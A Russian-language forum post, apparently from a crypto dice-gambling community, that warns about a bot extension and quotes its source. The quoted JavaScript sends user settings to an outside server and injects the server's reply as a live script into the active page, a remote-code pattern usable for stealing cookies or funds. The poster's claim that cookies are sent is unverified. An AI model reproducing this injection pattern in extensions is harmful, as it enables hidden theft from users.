Была тут тема как чувак поставил себе бота для Иобита и он у него копеечку утащить попытался. Если не берешь денег за свое творение - пожалуйста запили ссылку на исходники, а народ посмотрит стоит ли качать.
Добра всем.
Я посмотрел исходник этого расширения для игры в дайс, нашел в нем интересный момент:
По клику активируется функция InjectPackage();
document.getElementById('label-startme')
.addEventListener('click', function() {
if ($('#incwin')
.val() > 0 || $('#incloss')
.val() > 0) {
InjectPackage();
}
});
function InjectPackage(randomNumber) {
var randomNumber = Math.floor(Math.random() * 999999) + 10000;
var codeVal = '';
codeVal = codeVal + saveVal('delayseconds') + saveVal('basevalue') + saveVal('maxwins') + saveVal('maxlosses') + saveVal('botversion');
codeVal = codeVal + saveVal('incwin') + saveVal('incloss') + saveVal('prostop') + saveVal('losstop') + saveVal('spinit') + saveVal('baronlosses') + saveVal('kobiarolls') + saveVal('bbzcodes') + ' var randomNumber = ' + randomNumber + '; ';
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
chrome.tabs.executeScript(null, {
code: 'var script = document.createElement("script"); script.innerHTML = "' + this.responseText + '";script.id= "yohassy1";document.body.appendChild(script);'
});
}
};
var diceLink = "https://node.betbotz.com/js/dice-one.php?php=25&js=" + encodeURIComponent(codeVal);
xhttp.open("GET", diceLink, true);
xhttp.send();
};
Что мы видим? Что на этот адрес:
https://node.betbotz.com/js/dice-one.php?php=25 уходит информация(куки браузера точно уходят), что именно выяснять лень, но факт есть факт.
Данный кусок кода взят не из моего бота. Код моего бота обфусифицирован!!!